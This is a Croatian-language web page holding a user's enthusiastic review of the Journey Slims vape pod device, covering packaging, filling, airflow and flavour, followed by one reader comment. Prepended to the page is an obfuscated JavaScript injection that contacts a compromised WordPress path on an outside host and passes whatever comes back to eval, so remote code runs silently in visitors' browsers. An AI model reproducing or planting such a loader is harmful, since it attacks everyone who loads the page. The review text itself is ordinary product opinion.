;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Slims by Journey – Review by Zrinka

Unboxing i prvi dojmovi 😉Jejejeee jupi i tako to, stigao i meni danas Slims! Onaj osjećaj kad dođeš s posla a čeka te v@pe mail – odma ti je dan nekako.. popravljen..Dakle, slijedi esej, svi koji kolutaju očima na dugačke tekstove nek odu igrat tetris, ja od kratkih stvari volim samo kruškovac, nema tu pomoći.

Slims pakiranje

Slims, pakiranje: Ovaj smišlja kutiju, onaj pak sklapa kutije onaj treći ih printa i šta ti ja znam.. Iskrena da budem, mislila sam da je to neka jeftina kutija od onog hrapavog bezveznog kartona kad ono bome jok! Kutija je čvrsta kvalitetna bar pod rukom od onog finog glatkog kartona, ima i onaj jezičac koji se povuče kako bi se došlo do slimsića. Ok, kutija možda ne utječe na kvalitetu samog uređaja ali bome ovak u ruci ostavlja baš fin kvalitetan dojam. U kutiji je Slims i kablić, onaj fini plosnati, usb c djeluje izdržljivo i čvrsto jedino bi naravno mogo bit par desetaka cm dulji al što je tu je.

Slims uređaj

Sam Slims dolazi sa podom koji je već instaliran na njemu, spljošten je i to mi se baš sviđa jer logično nema kotrljanja po stolu. Uređaj je od nekog metala, od kojeg naravno pojma nemam ali izrada je kvalitetna, fino je to sve obrađeno pa iako je lagan ostavlja u ruci dobar dojam. Sviđa mi se što je cijeli uređaj rebrast tj ima okomite tanke reljefne crtice, em je fora pod rukom em zbog tih linija nije klizav. Po izgledu me malo podsjeća na Viip samo je mislim mrvicu dulji, lijeno mi sad ić kopat i tražit Viip da ih usporedim al budem malo kasnije.

Ajd da se vratim na pod. Pod se najprije treba izvaditi iz uređaja kako bi se kao prvo skinula zaštita s donje strane i kako bi ga se naravno napunilo. Punjenje je fora, u rupicu s donje strane poda se gurne bočica, rupa ko i svaka rupa u startu pruža otpor ali nema predaje, samo se malo jače gurne špic bočice i onda se toči tekućina.. Trebalo mi je desetak sekundi da svladam tu duplu primjenu sile dakle em guraš bočicu em stišćeš istu tu bočicu da bi tekućina ušla di već treba ući, takvo mi je punjenje fora jer mi se čini da su definitivno smanjene šanse za prolijevanje tekućine..Eh, kad se tekućina natoči, bočica se samo izvadi, taj se neki feder il šta je već vrati na svoje mjesto i to je to, nema nikakvih poklopaca čepova, nema zavrtanja ni sličnih aktivnosti..

Kad je pod napunjen naravno treba pričekat da se grijač natopi, svi to znaju al ajd, ako čita neki početnik neka i toga tu..Pod se stavi u uređaj sa tim dijelom di se puni prema dolje, sve je jasno samo po sebi a i nema neke velke filozofije jer magnet odradi svoj posao..Na vrhu poda je rupa hm možda ne mogu baš reć drip tip jer nije ali eto otvor kroz koji se pari, da bi se došlo do otvora potrebno je maknuti gumenu zaštitnu kapicu. Većina Slimsača je to maknula i bacila ali meni to nije u planu, kapica je odlična za zaštitu rupe od upadanja prašine i mrvica u istu a to je vrlo lako zamisliv scenarij ako se podić nosa po džepovima.

Uređaj je spljošten, pod je spljošten pa je logično samim time spljošten i taj dio koji ide u usta, nakon običnih okruglih drip tipova prvih 5 pufova mi je na ovom bilo malo neobično zbog tog oblika ali to je doista stvar na koju se navikneš za 20 sekundi..

Testiranje Slimsa

Mozgala što utočiti za test, reko ajd nešto što ti je fino, što puno pariš i čemu poznaješ okus onako, kako spada.. Izbor je naravno i logično pao na Piticu od jabukaa Journey Medieval Pie. Nalila na gore opisan način, pričekala desetak min iiii, uživancija je jednostavno počela..

Uređaj je kao prvo jako tih, povukla par put na prazno dok nije pod bio u uređaju jer rekoše da tako treba tako da kad sam ga priključila valjda se popelo gore malo tekućine pa je grgoljao prvih par pufova ali ubrzo je i to nestalo. Dakle radi tiho i glatko bez lupkanja puckanja i ostalih neželjenih zvukova.

Zraka ima taman kolko treba, ok ja ne volim ono skroz zatvoreni mtl kad vučeš da ti uši otpadaju tako da je meni taman. Gumbića nema, zaboravih to napisat dakle ti vučeš a on radi i to radi taman kako treba, taj senzor il što je već koji pali uređaj je naštiman s mjerom, nije da se aktivira čim mu namigneš, nije da moraš vuć ko sivonja da bi se aktivirao nego mu je taj okidač taman negdje na sredini. Ima i fora opciju kad vučeš da se sam gasi nakon, e sad dvije tri sekunde ne znam ali taman za jedan prosječan puf, definitivno se ne ugasi prerano a opet nekako imam dojam da ta opcija čuva i štiti grijač od pregrijavanja.

E sad okus: Nalila piticu jer ju kao prvo volim a kao drugo pa i nije baš najjednostavnija aroma na svijetu tako da odma idemo jakooo, nema mi smisla tu sad ulit nešto banalno.. Pare je bar meni sasvim dovoljno, nije da nemaš šta udahnut već je onako savršeno koliko treba za mtl. Probala sam pitu i na Kiwiju i na Zlideu i na Zenithu i na Nautilusu i na zeusu, ma na svemu što imam, ok ok, znam, to je sve na gotove grijače ali definitivno s njom imam iskustva, kakvog takvog ali ga imam..

Mogu reći da Slimsić sve arome baš fino izvlači, možda mrvicu više gura jabuku u prvi plan od ostalih atomizera na kojima sam ju probala ali samo možda, moram to empirijski provjeriti a da bi to napravila moram dić guzicu i oprat atije 😉 prvo je kava na redu ipak..Dakle sve se osjeti i jabuka ta fina pečena i tijesto ono crumbleasto fino hrskavo pečeno i sveeeee..

Na kolko mu je baterija pojma nemam, otvorila, cuclam pa kad se skroz isprazni ide na punjenje..Cuclam ga evo ko da nemam šta drugo i mogu reći da se uopće jako ne grije..

Zaključak

Zaključak: po meni odličan, kvalitetno napravljen i lijep pod uređaj malih dimenzija, praktičan sa podom čiji grijač daje odličan okus..Realno ga mogu kao što rekoh usporediti samo sa Viipom jer su tu negdje i po izgledu i po namjeni i ovo je bar po meni tisuću puta bolji i kvalitetniji uređaj. Zbog jednostavnosti korištenja isto je tako odličan izbor i za iskusnije v@pere za one trenutke kad je na poslu ludnica i kad čovjeku treba par pufova bez suvišne filozofije a opet da tih par budu kako spada..

Evo, u međuvremenu sam našla i Viip i da, zeznula sam se, iste su dužine bez poda, slims je mrvičak širi ali saamo malo, kako je sa podovima ne znam jer za Viip nemam pod.Ajde, mogu povuć paralelu i sa Kiwijem, čini mi se da Slimsić ima malo jači grijač i da u odnosu na Kiwi daje malo više pare i okusa al opet, samo mislim, morat će i tu bit jedan eksperiment upriličen..Koliko traje grijač naravno da još nemam pojma ali obratit ću i na to pažnju pa kad rikne napišem…

Eto, mislim da me je dosta za danas 😉

Autor: Zrinka Hakala

Choose your Reaction!
  • Kad pročitaš Zrinkinu recenziju, odmah bi potrčao i kupio to što je recenzirala ;)
    Čak i ako ti ne treba.
    Srećom, nemam toliko novaca na raspolaganju da bih kupio baš sve,
    a ostalo je i nešto malo zdravog razuma u ovoj tintari.

    Kako god, izvrsno napisana recenzija, bravo Zrinka!

Leave a Comment